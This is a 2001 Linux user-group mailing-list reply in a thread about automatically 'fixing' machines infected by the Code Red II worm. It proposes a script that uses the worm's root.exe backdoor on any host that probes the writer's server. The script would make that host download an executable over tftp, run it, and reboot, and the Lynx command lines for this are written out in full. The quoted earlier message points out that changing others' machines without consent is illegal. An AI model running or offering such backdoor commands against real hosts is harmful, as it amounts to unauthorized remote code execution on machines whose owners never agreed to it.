Actually, since code red II installs a backdoor, you could have an
autoresponder script that gets run against the ip of the machine hitting
default.ida on your webserver.

Something like (friggin outlook capitalizes all of the following lines):
Lynx -source
http://infectedhost/scripts/root.exe+/c+tftp+-i+tftpserver.yourdomain.com+GE
T+iispatch.exe+c:\iispatch.exe > /dev/null
Lynx -source http://infectedhost/scripts/root.exe+/c+c:\iispatch.exe >
/dev/null
Lynx -source http://infectedhost/scripts/root.exe+/c+reboot

Or something similar.  You'd probably need something in there to remove the
worm also, because the patch won't remove the worm from the system.



> -----Original Message-----
> From: joel at luths.net [mailto:joel at luths.net] 
> Sent: Tuesday, August 07, 2001 1:10 PM
> To: tclug-list at mn-linux.org
> Subject: Re: [TCLUG] Code Red Auto Fix
> 
> 
> Seems like webmaster at domain is often a black hole anyway. 
> Anyone who still has 
> an unpatched IIS is unlikely to have set up a proper 
> webmaster mail account.
> 
> Quoting Yaron <jethro at freakzilla.com>:
> 
> >   Hi,
> > 
> > On Tue, 7 Aug 2001, Spencer J Sinn wrote:
> > 
> > > Making changes or modifications to anyones machine without their
> > express
> > > consent is illegal. Setting up an auto-mailer to contact the 
> > > webmaster is not a bad idea.
> > 
> > Except a lot of these are dorky kids running NT with no 
> mail support.
> > 
> > 
> > -Yaron
> > 
> _______________________________________________
> tclug-list mailing list
> tclug-list at mn-linux.org 
> https://mailman.mn-> linux.org/mailman/listinfo/tclug-list
>